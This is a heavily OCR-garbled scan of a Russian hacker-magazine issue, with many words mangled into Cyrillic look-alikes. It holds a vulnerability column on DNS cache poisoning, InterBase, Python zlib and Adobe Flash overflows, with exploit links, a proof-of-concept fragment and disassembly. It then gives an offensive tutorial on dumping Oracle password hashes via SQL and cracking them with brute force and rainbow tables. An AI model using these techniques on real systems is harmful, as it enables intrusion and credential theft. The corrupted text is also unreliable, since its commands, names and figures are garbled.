ѵѵѵѵѵѵ.іпіеі.сот . а попадал на сервер 
злоумышленника, начиненный 
зловредными программами. Когда 
жеошибки в ОЫБ-серверахбыли 
исправлены, хакеры переключились 
на атаки ОЫБ-клиентов, что оказа- 
лось намного сложнее, поскольку 
типичная пользовательская машина 
генерируетсравнительно неболь- 
шое количество йМБ-запросов в 
единицу времени. «Скормить» ей 
поддельный ОЫБ-ответ не так-то 
просто. Для этого необходимо знать 
ІР-адрес оригинального РЫБ-сер- 
вера, номер ІШР-порта источника 
и 16-битный идентификатор ТХЮ 
(Тгапзасііоп Ю). В силу высокой 
предсказуемости двух последних 
значений атака на ЫТ не представ- 
ляла большой проблемы, о чем 
МісгозоЙ узнала лишь в марте 2004 
года, исправив ошибку в ѴѴ2КБР4 и 
ХР5Р2. Точнее, она думала, что ее 
исправила... Согласно исследовани- 
ям Атіі Кіеіп (из компании Тгизіеег), 
АИа ВегігоиІсЬко (компания Бсапіі) 
и Роу Агепсіз (компания Ыотіпеі 



УК), ошибка никуда делась, и даже 
самые последние версии ѴѴіпсІоѵѵз 
подвержены угрозе атаки. Ат И: Кіеіп 
подробно описал технику атаки в 
документе « М іеговой ѴѴіпсІоѵѵз йЫБ 
БіиЬ Резоіѵег СасЬе Роізопіпд» вме- 
сте с исходными текстами ргооі-оі- 
сопсері ехріоіі'а: ЬйрУАѵѵѵѵѵ.ІгизІеег. 
сот/сІосв/МісгозоЙ ѴѴіпсІоѵѵз 
гезоіѵег РЫБ сасбе роізопіпа.рей . 
Ознакомившись с этим иссле- 
дованием, один из сотрудников 
Мі егозой выразил в своем блоге 
резкое несогласие: Ыоаз.іесбпеі. 
сот/5Уѵі/агсЬіѵе/2008/04/09/тз08- 
020-Ьоѵѵ-ргесІісІаЬІе-І5-іЬе-сІп5- 
Ігапзасііоп-ісі.азрх . Ну а пока между 
ними идут разборки, дыра попала на 
Бесигііу Росиз: ѵѵѵѵѵѵ.зесигііѵіосиз . 
сот/ЬісІ/28553/іпЬ . 



>>ТагдеІ5| 



Вся линейка ЫТ-подобных систем 
по Висту включительно (32-битные 
и 64-битные редакции). 



» Ехріоід 



Исходные тексты ехріоіі'а можно 
найти в статье Атіі Кіеіп’а: уууууу. 
ІгизІеег.сот/сІосз/М іеговой 
ѴѴіпсІоѵѵз гезоіѵег РЫБ сасбе 
роізопіпд.рей . 



»5оІи*іоп 



Установить на рабочей станции 
свой собственный ОЫБ-сервер 
(например, бесплатный БМАІ_І_ 
НТТР), напрямую обращающийся 
к корневым РЫБ-серверам по 
ТОР- прото колу, и заблокировать 
53- II В Р порт на брандмауэре для 
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Репрозиторий с пофиксенной гІІЬ 



отсечения подложных ОЫЗ-от- 
ветов. 

ВОШ_А№ 
ШТЕКВА5Е5 

УДАЛЕН- 
НОЕ ПЕРЕПОЛНЕНИЕ 
БУФЕРА 



>> Вгіе* 



1 1 апреля 2008 года была обнаро- 
дована информация о дыре в попу- 
лярном сервере баз данных Вогіапсі 
ІпІегВазе, подверженном угрозе 
удаленного переполнения буфера с 
захватомуправления. Ошибку обна- 
ружил сотрудник Ога сіе Согрогабоп, 
довольно известный (в узких кругах) 
специалист по безопасности 2беп 
Ниа біи, живущий в своей норе на 
побережье ПебѵѵоосГа. Исследуя 
дизассемблерные внутренности 
файла іЬзегѵег. ехе, он обратил 
внимание на отсутствие проверки 
длины переданных пользователем 
данных перед их копированием в 
локальный буфер. Это подтверждает 
код, снабженный комментариями 
(ищи его на ОѴО). 

Мы имеем дело с классическим 
стековым переполнением (буфер- 
приемник находится в стеке), со 
всеми вытекающими. На системах 
с исполняемым стеком мы запросто 
можем подменить адрес возврата 
из функции, передавуправление на 
5беІІ-код. На системах с неиспол- 
няемым стеком — ХР5Р2/5егѵег5Р1 
и выше при наличии аппаратной 
поддержки со стороны ЦП — при ак- 
тивном йЕР’е мы можем реализовать 
атакутипа геІигп21іЬс (поумолчанию 
йЕР за щи щаеттолько системные 
компоненты). Название, кстати, 
пришло из мира У N IX, в ѴѴіпсІоѵѵз 



нетіібс, вместо этого там КЕРЫЕІ_32. 
ОІ_І_, но сути это не меняет. На сис- 
темах с рандомизацией адресного 
пространства (Висла/5егѵег2008) 
передатьуправление на збеіі-код, 
скорее всего, не удастся, и жертва 
получит крах, ведущий к остановке 
сервиса «ІпІегВазе ІЬзегѵег». 



>>Тагдеі5:| 



Уязвимость подтверждена в Вогіапсі 
ІпІегЬазе 2007 5Р2 [іЬзегѵег . ехе 
ѵегзіоп 8. 0. 0. 123). Остальные 
версии не проверялись, но, возмож- 
но, они также уязвимы. 



» Ехріоііі 



Ниже приведен исходный код 
ргооі'-оі-сопсері ехріоіі’а, пере- 
дающий управление на зЬеІІ-код. 
Его можно скачать по адресу: 
ѵѵѵѵѵѵ.зесигіЫосиз.сот/сІаІа/ 
ѵиІпегаЬіІіІіе5/ехрІоіІз/28730.рІ . 



»5оІи*іоп 



Производитель еще никакие 
отреагировал на сообщение о дыре 
и когда появится «лекарство» в виде 
заплатки — неизвестно. Особо озабо- 
ченные проблемой могут пропатчить 
код іЬзегѵег. ехе, воткнув туда 
несколько машинных команд для вы- 
полнения проверки границбуфера. 

РѴТНОИ 

УДАЛЕННОЕ 
ПЕРЕПОЛНЕ- 
НИЕ БУФЕРА 
В БИБЛИОТЕКЕ 2ЫВ 



» Вгіе* 



Хакер Иизііп Регдизоп из ІОАсбѵе 
Эесигку Асіѵізогу 9 апреля этого 
года обнародовал обнаруженную 
им дыру в популярной библиотеке 





2 Іі Ь. Библиотека входит в штатный 
комплект поставки языка РуіЬоп, 
приобретающего с каждым днем 
все большую и большую распро- 
страненность, и потомуугроза 
вполне актуальна. «Сидит» ошиб- 
ка в функции Ру2ІіЬ_ипЫизЬ, 
реализованной в файле РуѣЬоп- 
2.5. 2 /Мосіиіез/ 2ІіЬтод.и1е . с. 
Функция выполняет сброс (йизЬ) 
указанного количества байт, 
заданного знаковым аргументом 
(всегда трактуемым как положи- 
тельное целое без проверки на от- 
рицательное значение; передача 
которого функции выделения па- 
мяти приводит к резервированию 
одного байта буферной памяти). А 
вот функция копирования данных 
в буфер после преобразования от- 
рицательного знакового аргумента 
в беззнаковое получаеточень 
большое число, соответствующее 
нескольким гигабайтам памяти. 
Естественно, это приводит к пере- 
полнению кучи. Дыра объявлена 
удаленной, хотя на самом деле 
она локальная. Моменттребует 
пояснений. Да, действительно, 
дыра локальна по своей природе 
и, чтобы добиться переполнения, 
необходимо вызывать функцию 
ЛизЫ)- Это можно сделать, только 
если запускать РуШоп-программы 
на целевой машине, для чего там 
должен быть установлен интер- 
претатор языка, а хакеру — пре- 
доставлен зЬеІІ с возможностью 
выполнения РуіЬоп-программ. 

Но даже при таком оптимистич- 
ном раскладе злоумышленник не 
сможет за валить операционную 
систему, а только запущенный 
экземпляр интерпретатора. Или 
(в идеале) захватить управление 
системой без превышения уровня 



имеющихся у него привилегий. А 
оно ему надо? Так что атака носит 
сугубо лабораторный характер. 

Л ишь в тех немногих случаях, 
когда интерпретатор РуіЬоп’а 
запускается на более высоком 
уровне привилегий, хакер может 
поиметь с этого какую-то выгоду. 
Подробности на ѵѵѵѵѵѵ.зесигіМосиз. 
сот/ЬісІ/28715 . 



»ТагдеІ5| 



Дыра подтверждена в РуіЬоп вер- 
сии 2.5.2, остальные версии также 
могут быть уязвимы. 



» Ехріош 



Исходный текст ргооі'-о^-сопсері; 
ехріоіі'а лежит на ѵѵѵѵѵѵ.зесигіЫосиз. 
сот/сІаІа/ѵиІпегаЬіІіІіез/ехрІоіІз/ 
2871 5. рѵ . а ниже приведен его клю- 
чевой фрагмент: 



Ключевой фрагмент 
ргоо*-о{-сопсерІ ехріоіі'а 

сошрМзд = 

2 ІіЬ. сошргезз (шзд) 
ЪасЭ. = -24 
йесошрОЬз = 

2 ІіЪ.<іесотргеззоЪз () 
сІесотрОк^ . йесотргезз 
(сошрМзд) 

йесошрОЬз . ЕІизЬ (Ъа<3) 



»5оІиІіоп 



Разработчики исправили ошибку, но 
пока только на 5ѴІ\І-репрозитории 
( Ьиаз.рѵ1:Ьоп.огд/І55ие2586 ).Ждем-с 
выхода очередной стабильной 
версии. 



АйОВЕ 

РЬАЗН 

и РЬАѴЕВ 
УДАЛЕННОЕ ПЕРЕПОЛ- 
НЕНИЕ БУФЕРА 




Платите $1450 и получайте статус САЫѴА5 Ргоіеззіопаі с полным доступом к 
исходному коду сотен ехріоіі'ов! 
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Структура 5ѴѴР-файла 



» Вгіе* 



9 апреля 2008 года Магк йоѵѵб из исследовательского подразделе- 
ния 155 Х-Еогсе, входящего в состав корпорации I В М , совместно с 
хакером ѵѵизбі из группы 1еат509 обнаружили и опубликовали дыру 
в АбоЬе РІазЬ Ріауег, работающем под управлением операцион- 
ной системы Ыпих. Для реализации атаки достаточно «скормить» 
жертве специальным образом сконструированный зѵѵі-файл (скажем, 
заманив на ѵѵеЬ-страничку или послав файл почтой]. Главное, чтобы 
АбоЬе РІазЬ Ріауег был установлен! Ошибка носит систем но -незави- 
симый характер, хотя, с учетом различий реализаций под ѴѴіпбоѵѵз и 
Ыпих, для каждой конкретной платформы требуется свой зѵѵі-файл 
сумышленно искаженным полем 0еРпе5сепеАпс1Ргате1_аЬеШа1а. 
5сепеСоипІ, содержащим количество «сцен», которые необходимо 
считать из файла. 5сепеСоипІ представляет собой двойное знаковое 
слово, но проверка на отрицательное значение не выполняется, и 
хакер получает возможность модифицировать любую (ну, или практи- 
чески любую) ячейку адресного пространства внутри процесса. Это 
открывает широкие горизонты для атак, особенно с учетом того, что 
АбоЬе РІазЬ Ріауег не использует возможности рандомизации адрес- 
ного пространства, предоставляемые Вистой и некоторыми версиями 
Ыпих’а. Для захвата управления машиной (с привилегиями РІазЬ 
Ріауег’а] было бы достаточно перезаписать указатель на функцию 
или подменить адрес возврата, но Магк ОоѵѵсІ пошел намного более 
крутым и радикальным путем, атаковав виртуальную НазЬ-машину, 
интерпретирующую байт-код и известную под именем АсІіоп5сгірІ 
ѴігІиаІМасЬіпе (или, сокращенно, АѴМ). Достоинство такого подхода, 
во-первых, в его новизне, а, во-вторых, в системной независимости. 
Байт-код виртуальной машины не привязан к конкретной платформе, 
и потому однажды сконструированный ехріоіі не нужно переписы- 
вать под всю процессорную линейку, на которой только реализован 
АбоЬе РІазЬ Ріауег: х86, х86-64, РРС, еіс. Подробнее об этом можно 
прочитать в статье Магк’а ОоѵѵсІ’ а — «Арріісаііоп-Бресіііс АІІаскз: 
Беѵегадіпд 1Ье АсІіопБсгірІ Ѵігіиаі МасЬіпе», доступной всем же- 
лающим: сІоситепІз.ізз.пеі/ѵѵЫіераоегз/ІВМ Х-Рогсе ѴѴР Ііпаі.обі . 
Также рекомендуется посетить 5есигі1у Росиз: ѵѵѵѵѵѵ.зесигііѵіосиз. 
сот/Ьіб/28695 . 



► 050 



»Тагде*5| 



АбоЬе РІазЬ Ріауег 8.0.34.0/8.0.35.0/9/9.0. 1 15.0/9.0.28.0/9.0.31 .0/9.0.45.0/ 
9.0.47.0/9.0.48.0 (дистрибутивы РебНаІ Епіегргізе Ыпих ОезкІор/РебНаІ 
Епіегргізе Ыпих ЕхІгаз/РесІНаІ Епіегргізе ЫпихЕиррІетепІагузегѵег/ 
5.и.5.Е. Ыпих 10.1 ррс/5.и.5.Е. Ыпих 10.1 х86/5.и.5.Е. Ыпих 10.1 х86-64/ 
5.и.5. Е. Ыоѵеіі Ыпих йезкіор 9/5. и. 5. Е. орепБІбБЕ 10. 2/5. и. 5. Е. орепБЫБЕ 
1 0.3 и другие). 



» ЕхрІоШ 



Ргооі-оі-сопсері ехріоіі доступен только подписчикам «Іттипііу САЫѴА5 
Еагіу Іірсіаіе Ргодгат». Членство обойдется в $1450 на 3 месяца (продление 
стоит$730 в квартал). Подробности: ѵѵѵѵѵѵ. іттипііѵіпс.сот/ргобисіз-сапѵаз. 
зЫтІ . 



»5оІиІіоп 



Производитель уже выпустил РІазЬ Ріауег 9.0.1 24.0, свободный от 
ошибки переполнения, а для старых версий доступно бесплатное 
обновление, выложенное на ѵѵѵѵѵѵ. асІоЬе.сот/зиррогі/зесигіІѵ/ЬиІІеІіпз/ 
арзЬ08-1 1 .Ыті . Однако, ни новая версия, ни обновление не исправля- 
ют всех ошибок. Проверка поля 5сепеСоипІ на отрицательное значение 
появилась (какое огромное достижение, вах!), но дефекты виртуаль- 
ной АѴМ -машины как были, так и остались. По-прежнему возможен 
обход верификатора байт-кода и прочиетрюки, которым планируется 
посвятить отдельную статью. В этом обзоре (в связи с ограничениями 
по объему) мы рассмотрим непосредственно саму ошибку знакового 
переполнения. 



РІЛ-ЮІЗСІ-ОЗЕ 

Для анализа дыры в РІазЬ-рІауег’е, помимо самого плеера (который 
уже наверняка установлен в системе), нам понадобится специфи- 
кация на 5ѴѴР/РЕѴ-файлы, последнюю редакцию которой (на мо- 
мент написания этих строк — 9’ю], можно скачать с сервера фирмы 
Масготебіа: боѵѵпІоаб.тасготебіа.сот/риЬ/ІІазЬ/Іісепзіпа/ІіІе 
Іогтаі зресііісаііоп ѵ9.рбІ . 

Осторожно! При первом открытии рбі-файла эта сволочь лезет в Сеть, пере- 
давая наши данные и запрашивая сертификат. Для сохранения инкогнито 
рекомендуется воспользоваться брандмауэром. Спустя какое-то время 
АбоЬе АсгоЬаІ Реабег сменит гнев на милость и отобразит содержимое спе- 
цификации, предварительно «выплюнув» на экран противный ЫАб-Бсгееп 
стекстом лицензионного соглашения и стандартными кнопочками «Адгее» 
(Принять) и «Оізадгее» (Послать на :]). 

Структура 5ѴѴР-файлов состоит из последовательности различных 
объектов: фигур, звуков, шрифтов, текста, еіс. Все они обрабатыва- 
ются вполне корректно (дефектов реализации нет или таковые еще 
не найдены). Но вот структура Бе^і п еЗсепеАпдРгатеЬаЪеІВаѣа, 
описывающая сцену (5сепе), подвержена целочисленному знаковому 
переполнению. 

Рассмотрим структуру Бе іі п еЗсепеАпсІРгатеЬаЪеІОаІа более под- 
робно. Как видно, она включает в себя массив сцен 5сепез. Их количество 
задано в переменной ЗсепеСоипЬ типа ипзідпед. іпі32 (беззнаковое 
двойное слово), которая лежит рядом с массивом. 



Теговая структура ОеІіпеБсепеАпсіРгатеІ-аЬеШаІа 
(Іад Ш 0x56), подверженная целочисленному знаковому 
переполнению 

// вспомогательные структуры 
ЗсепеБаЬа 
{ 

ІІІ32 РгатеОЕЕзеЬ 
ЗЬгіпд ЗсепеИате 

} 

РгатеБаЬа 

{ 

ТЛ32 Ргате№лпЬег 
ЗЬгіпд РгатеЬаЬеІ 
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Іицензионное соглашение, всплывающее при попытке открытия рсіі- 



} 



// теговая структура 
БебіпеЗсепеАпсІРгатеЬаЪеІВаба 
{ 

КесогбНеабег Неабег 

ІЛ32 ЗсепеСоипР 

ЗсепеБаба Зсепез [ЗсепеСоипб] 

ІЛ32 РгатеСоипб 

РгатеБаба Ргатез [РгатеСоипб] 

} 



Теперьзагрузим ИазЬ-рІауег в дизассемблер и посмотрим на код, обраба- 
тывающий переменную ЗсепеСоипі вместе с массивом Зсепез: 



Дизассемблерный фрагмент РІазИ Ріауег’а, в котором 
происходит переполнение 

.ДехД :3 0087А42 саіі ЗМРЩЗебЕпсосІесІІпбедег 

; получить Зсепе Соипб 
. ДехР : 30087А47 тоѵ ебі , [еЬр+агд_0] 

. бехб : 30087А4А шоѵ [езі+4] , еах 

; ЕАХ : = Зсепе СоипД 

. ДехЬ : 30087А4Б шоѵ есх, [еЬх+8] 

; ЕСХ — размер зѵ^б- файла 
. бехб : 30087А50 зиЬ есх, [еЬх+4] 

; ЕСХ — кол-во байт до конца файла 
. бехб : 30087А53 стр еах, есх 

; ? (Зсепе Соипб > ЕСХ) 

. ЬехР : 30087А55 ^д 1ос_30087ВВ4 

; <- не выполняется, если ЗС < О 
. ЬехР : 30087А5В безб еах, еах 

; проверка на нуль 

. бехб : 30087А5Б ]2 1ос_30087В0Е 

; <- не вьтолняется, если ЗС < О 



. бехб : 3 0087А63 
. Ьехб : 30087А66 
. бехб : 3 0087А68 
. Ьехб : 30087А6А 
; пСоипб 
. бехб : 3 0087А6С 
. бехб : 30087А6Б 



шоѵ есх, [ебі+20Ь] 
ризЬ 3 
ризЬ 3 
ризЬ ОСЬ 

ризЬ еах ; пЗіге 

саіі шеш_Са11ос 



; обламывается, если ЗС < О 
. бехб : 30087А72 ризЬ еах 

; ЕАХ : = 0 , если ЗС < О 
. бехб : 3 0087А73 шоѵ есх, езі 

. бехб : 30087А75 саіі зиЬ_3004А7бб 

; делает разные неинтересные дела 
. бехб : 30087А7А апсЗ [еЬр+агд_0], О 

. бехб : 30087А7Е стр сЬгогб рбг [езі+4], О 

. бехб : 30087А82 }1е зЬогб 1ос_30087АРА 

; всегда выполняется 

Сначала переменная ЗсепеСоипІ сравнивается с количеством байт, 
оставшихся до конца зѵѵі-файла. Сравнение осуществляется при 
помощи машинной команды ЗС, интерпретирующей ЗсепеСоипІ как 
знаковую переменную. Если ЗсепеСоипІ. < 0, эта проверка завер- 
шится успешно (для хакеров), поскольку всякое отрицательное число 
больше любого положительного количества байт, отличного от нуля; 
проверка на нулевое значение ЗсепеСоипі также выполняется. 
Какие, однако, аккуратные программисты! Целых две проверки, и все 
не в тему! 

А дальше. .. ЗсепеСоипі передается функции выделения памяти л?ет_ 
Саііос () , интерпретирующей ее как беззнаковую переменную. Поскольку 
знаковый бит — самый старший битчисла, мы запрашиваему функции 
тет_Са11ос ( ) , как минимум, 2 Гб памяти. Последние, естественно, не 
выделяются, но проверка на успешность выделения отсутствует, так как 
программисты по своей наивности полагают, что память — ресурс неисчер- 
паемый. Они заблуждаются, и в нашем случ а етет_Са 11 ос () возвращает 
ноль. Остается только разобраться, что делает программа с полученным 
указателем. А делает она с ним следующее (для краткости дизассемблер- 
ный листинг переведен в псевдокод): 



ПСЕВДОКОД ФУНКЦИИ, ПОЗВОЛЯЮЩЕЙ ХАКЕРУ ПЕРЕЗАПИСЫВАТЬ 
ЛЮБУЮ ЯЧЕЙКУ ПАМЯТИ 



. бехб :30087АРА 
. бехЦ : 30087АРБ 
. бехЦ : 3 0087АРЕ 
. бехб : 30087В02 
. бехб : 30087В05 
. бехб : 30087В08 
. бехЦ : 30087В0В 



тоѵ еах, [езі+4] 
ЗсепеСоипЬ 

тоѵ есх, [езі] 
гебигпеб роіпбег 

Іеа еах, [еах+еах*2] 

ЕАХ := ЕАХ*3 

Іеа еах, [есх+еах*4] 

ЕАХ := ЕАХ*4 + роіпбег 

тоѵ есх, [еЬр+агд_8] 

ЕСХ := РгатеСоипбег (или ЕС) 
зиЬ есх, [еах- ОСЬ] 

ЕСХ := ЕС-* ( (ЗС-1) *12+роіпбег ) 
тоѵ [еах- 4] , есх 
* (ЗС*12+роіпбег-4) = ЕСХ 



Поскольку роіпіег, возвращенный функцией тет_Са11ос () , у нас равен 
нулю, мы получаем следующий псевдокод: * (ЗсепеСоипі * 12 -4) = 
РгатеСоипі-* ( (ЗсепеСоипі-1) *12) . Если помнить, что переменные 
ЗсепеСоипІ и РгатеСоипІ: представляют собой двойные слова, полностью 
контролируемые хакером, подбирая их различные сочетания, мы можем 
модифицировать различные ячейки памяти. Сучетом ограничений, нала- 
гаемых данной формулой. Каких именно? 

Путем несложных преобразований получаем: (0x80000000 I 
( (асісігезз + 4) /12)) доесть можно модифицировать только те адреса, 
которые после добавления к ним четырех байт делятся на 1 2 без остатка. Не 
такое уж и жестокое ограничение! В подвластной нам области памяти без 
труда можно отыскать кучу интересных указателей на функции (напри- 
мер, адресов возврата). Само собой, речь идеттолько о модификации тех 
областей, что доступы на запись — это стек, куча, секция данных, а также 
некоторые служебные структуры операционной системы, расположенные 
в нижней половине адресного пространства. Короче, главное фантазию 
иметь, а за реализацией атаки дело не станет! ~в~ 
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РазѵѵогсІ 



І5ѴѴ0ГСІ 



ЗАПАРОЛЕННАЯ 



ВЛАСТЬ 



Если ты читал наши предыдущие статьи, ты уже имеешь представление 



■как удаленно порутать Огасіе. Считай, что доступ к базе мы получили 



Бодіп: 






Бодіп: 


РазѵѵогсІ: 






РазѵѵогсІ: 




% ^ 1 







но что дальше? Как поднять свои права? И что можно получить, имея доступ 



к системным таблицам? Слушай сюда, сейчас расскажу. 



е всегда доступ к базе данных мы получаем с правами админи- 
стратора ЮВА). Бываютситуации, когда локальных эксплоитов, 
повышающих привилегии до роли ОБА, нет, а удаленно пароль 
к системному пользователю не спешит подбираться. Или, пред- 
положим,™ получил права администратора в СУБД, но не знаешь его пароль, 
аузнатьоченьхочется.таккакон, вероятно, можетподойти на ззЬ-доступ к 
серверу или к другим СУБД в компании. Что делать в таких случаях? Первое, 
что приходитнаум — получить доступ кхэшам паролей и попытаться их рас- 
шифровать. Рассмотрим, в каких ситуациях нам могутпомочьхэши паролей. 

1. Один из самых распространенных вариантов — получение доступа кбазе 
данных через БОБ-инъекцию в ѴѴЕВ-приложение, которое используетэту 
СУБД. Есть вероятность, что пользователь, от имени которого идут запросы 
к СУБД, имеет доступ на чтениетаблицы с паролями. 

2. Возможен случай удаленного получения доступа к консоли СУБД пользо- 
вателем, у которого по умолчанию есть доступ на чтениетаблицы схэшами 
паролей (права БЕБЕСТ АЫУ СІСТІОІЧАРУ), но нет роли ОВА.Тем самым, рас- 
шифровав пароль, мы получим права ОБА в базе данных, атакже сможем 
попытаться использовать подобранный пароль на другие сервисы. 

3. Доступ кхэшам паролей можно получить, найдя уязвимость класса 
РЕ/БОБ Іпіесйоп в функции или процедуре, которая исполняется от имени 
пользователя с правами БЕБЕСТ АЫУ СІСТІОЫАРУ, позволяющими читать 
системныетаблицы. Одна изтакихуязвимостей была найдена мной, и экс- 
плоит к ней можно отыскать по адресу ЬНр://тіІѵѵ0гт.согп/ехрІоЙ5/4995 . 



Как известно, многие админы зачастую имеют одинаковые пароли на 
доступ кразличным серверам и приложениям. Тогда что же мешает рас- 
шифровать пароль администратора СУБД Огасіе, тем более, что это бывает 
намного проще, чем расшифровывать пароль на операционную систему? 

г ХРАНЕНИЕ ПАРОЛЕЙ 

Сегодня мы изучим алгоритм хранения паролей в СУБД Огасіе и научимся 
ломать эти пароли. Сначала рассмотрим старый алгоритм. В СУБД Огасіе 
до 1 1 версии пароли пользователей хранятся втаблице(ЗЬа_изег5. На 
деле они хранятся в системной таблице ЗУЗ. ЦЗЕК$, а таблица ОВА_ІІЗЕКЗ 
— лишь представление (ѴІЕѴѴ) для вышеуказанной системной таблицы, но 
эти особенности не критичны. Итак, у на с есть доступ ктабшце ОВА_ЦЗЕКЗ. 
Чтобы достать из нее пароли, можно воспользоваться несложным запросом: 

50І_> БЕБЕСТ ІІБЕКЫАМЕ, РА55ѴѴ0К0 ЕРОМ 0ВА_и5ЕК5; 

Как мы видим на рисунке, поле РаззѵѵогсІ содержитхэш пароля, состоящий 
из 8 байт. Что же за алгоритм используется для хранения паролей? 

г АЛГОРИТМ ШИФРОВАНИЯ ПАРОЛЕЙ 

Алгоритм шифрования паролей в СУБД Огасіе был до поры до времени не- 
известен, пока в публичных источниках не появилась работа «Аззеззтегй 
оНЬе Огасіе РаззѵѵогсІ НазЫпд АІдогйЬт» авторов ^збиа ѴѴгідЫ и Сагіоз 
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Сі. В ней был подробно описан алгоритм шифрования паро- 
лей в Огасіе. Детальная информация предоставлена в статье 
по адресу: бир://ѵѵѵѵѵѵ.І5атЬи1.ас.ик/~ссісі/риЬІісаііоп5/ 
огасіе раззѵѵсІ.рсіЕ 

Алгоритм шифрования паролей в СУБД Огасіе был задей- 
ствован чутьли не с первых версий и не менялся вплоть до 
недавней версии 1 10. Сам алгоритм оказался нетаким ужи 
сложным. Вот как работает генерация хэша: 

• происходит конкатенация имени пользователя и пароля 
— если у нас есть пользователь с именем ЗУЗ и паролем 
ЬезЫ , то мы получаем строку ЗУЗЬезѣІ-, 

• далее вся строка преобразовывается к верхнему регистру, 
и мы получаем ЗУЗТЕЗТ1; 

• если в ОС используется однобайтовая кодировка, то каж- 
дый символ преобразовывается в двухбайтовый, заполнив 
старший байт нулями ( ОхОО}\ 

• получившаяся строка (дополненная нулями до длины бло- 
ка) шифруется алгоритмом 0Е5 в режиме СВС с фиксирован- 
ным ключом, значение которого — 0x01234567 89АВСРЕР-, 

• полученная строка шифруется еще раз с помощью йЕ5- 
СВС, но используя последний блок предыдущего шага как 
ключ шифрования. 

Теперь перечислим недостатки алгоритма, которые помогут 
нам при взломе. 

1. В качестве соли (заИ) используется предсказуемое значе- 
ние, а именно — имя пользователя. Это дает нам возможность 
использовать предварительно сгенерированныетаблицы для 
расчета пароля (гаіпЬо\л/ІаЫез),тем самым увеличив скорость 
перебора паролей в разы. 

2. Исходный словарь символов, используемых для генерации 
пароля, первоначально составляет 256 символов. Так как 
введенный пароль преобразовывается к верхнему регистру, 
то алфавит сужается до 256-26=230 символов. На самом деле 
символов еще меньше, так какоперация І1РРЕР ( ) действует 
не только для символов латинского алфавита. В итоге мы по- 
лучаем алфавит из 1 64 символов, каждый из которых можно 
использовать при генерации пароля (более подробно, откуда 
появилась эта цифра можно прочитать на форуме ЫТр:/Ал/\лллл 
реІебппіаап.сотЛогит/ѵаЬЬ/УаВВ.саі?ЬоагсІ=ога зес:а 
сІіоп=сіІ5рІаѵ:пит=1 131556773 ). Но это все втеории, а на 
практике при создании нового пользователя в командной 



строке СУБД Огасіе оказывается, что мы можем использовать 
далеко не все символы. Рассмотрим на примере. 

80Ь> сгеаЪе изег ЦезбОІ ісіепЦіііесІ Ьу аЬс123_ 
$#; 

Изег сгеаЦеЬ. 

8<2Ь> сгеаЦе изег Цезб02 ісІепЦіііеЬ Ьу 123аЬс#_ 
$ ; 

сгеаЦе изег Цезб02 іЬепЦіііесІ Ьу 123аЬс#_$ 

* 

ЕККОК аЦ Ііпе 1: 

ОКА-00988: шіззіпд ог іпѵаІіЬ раззѵѵогсі ( з ) 




> СІѴСІ 

На диске ищи все 
упомянутые в статье 
программы, а также 
увесистый документ по 
организации криптоал- 
горитмов в Огасіе. 



80Ь> сгеаЪе изег Цезб02 ісіепЦіііесІ Ьу _123аЬс; 
сгеаЦе изег ЦезЦ02 іЬепЦіЕіеЬ Ьу _123аЬс 
* 

ЕККОК аС Ііпе 1: 

ОКА-00911: іпѵаІіЬ сЬагасЬег 

3<2Ь> сгеаЦе изег Цезб02 ісІепЦіііеЬ Ьу 
аЬс123 Л * ; 

сгеаЬе изег Цезб02 іЬепЦіііесІ Ьу аЬс123 л * 

* 

ЕККОК аі: Ііпе 1 : 

ОКА- 0 0 922 : шіззіпд ог іпѵаіісі орЦіоп 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно с 
целью ознакомления! 
Ни автор, ни редакция 
за твои действия ответ- 
ственности не несет! 



30Ь> сгеаЦе изег {:езб02 ісіепЦіііесІ Ьу 
" Л *аЬс? " ; 



ІГзег сгеаЦеЬ. 

Часть паролей, которые мы пытались задать, не подходит (вы- 
дается сообщение «ОРА-00911 : іпѵаіід. сЬага с і:ег»). Из 
всего этого можно сделать простые выводы: 

1. Доступные в пароле символы — это латинский алфавит (26), 
цифры (10) и спецсимволы_,#,$ (3), всего — 39 символов. 

2. В качестве первого символа пароля могут использоваться 
только буквы. 
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3. Чтобы создать парольс другими спецсимволами, необходимо заключать 
пароль в двойные кавычки, как показано в последнем примере (но этой 
возможностью на практике пользуются редко). 



СОБСТВЕННО, ПОДБОР 

Итак, учитывая, что на практике редко кто использует пароли не из диапа- 
зона 39 символов, задача подбора существенно упрощается. Теоретически 
паролей из 8 символов может быть 26*39 л 7= 3.6 *10 л 1 2 комбинаций. 

Если посмотреть сравнение скоростей перебора паролей ( ЫЧрѴАлл/ѵѵѵ. 
гесІ-сіаІаЬазе-зесигііѵ.сот/ѵѵЫіерарег/огасІе раззѵѵогсІз.ЬітІ ). можно 
увидеть, что самый быстрый переборщик работает со скоростью примерно 
миллион паролей в секунду на среднем компьютере (на соге 2 био 2.4 ГГц 
удалось добиться максимальной скорости перебора — 1 .6 млн паролей 
в секунду при помощи утилиты ѵѵогааиІбЫ, которая умеет использовать 
многоядерные процессоры). 

Получается, чтобы перебрать 8-символьный пароль на стандартном 
рабочем компьютере, нам понадобится около 40 дней. И то — если пере- 
борщик знает, что первый символ может состоять только из букв, иначе 
и вовсе понадобится два месяца. Не слишком утешающие цифры, тем 
более, что столько времени мы будем подбирать парольтолько для одного 
пользователя — ведь для генерации хэша используется соль (заіі). Ну а 
если парольсостоитиз9символов,тотутсчет будет вестись уже на года. 
Но отчаиваться не стоит, всегда найдутся методы, позволяющие получить 
р езул ьтат б ы стр е е . 

^ КАШВ0ѴѴТАВІ_Е5 

При генерации хэша пароля в СУБДОгасІе используется дополнительный 
параметр (заіі), который, теоретически, должен предотвращать атаки 
посредством создания заранее сгенерированныхтаблицдля быстрого 
перебора паролей (гаіпбоѵѵІаЫез). Но раз соль (заіі) нам известна заранее 
(исключения составляют случаи, когда известен только хэш, но на практике 
это бывает крайне редко), значит, мы можем сгенерировать гаіпбоѵѵІаЫез 
для распространенных имен пользователей. Есть смысл генерировать 
таблицы для пользователей ЗУЗиЗУЗТЕМ, так как они есть в каждой СУБД 
и имеют по умолчанию права администратора ( ОБА ). 

Стеорией ПаіпЬоѵѵІаЫез, думаю, ты знаком по прошлым номерам журнала 
или читал в инете. На этом я останавливаться не буду, лучше расскажу, 
каксоздавать и использоватьтаблицы применительно к взлому паролей 
Огасіе. 
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Запуск огаЫ и ѵѵоогаЫ на соге 2 био 2.4 ГГц 




Тут существует два способа. Первый — сгенерировать таблицы самому, 
второй — скачать в Сети. Плюсы второго способа очевидны: не надо тратить 
время на генерацию таблиц, что может занять годы на среднестатистиче- 
ском компьютере. Хотя минусы тоже есть — не у всех интернет позволяет 
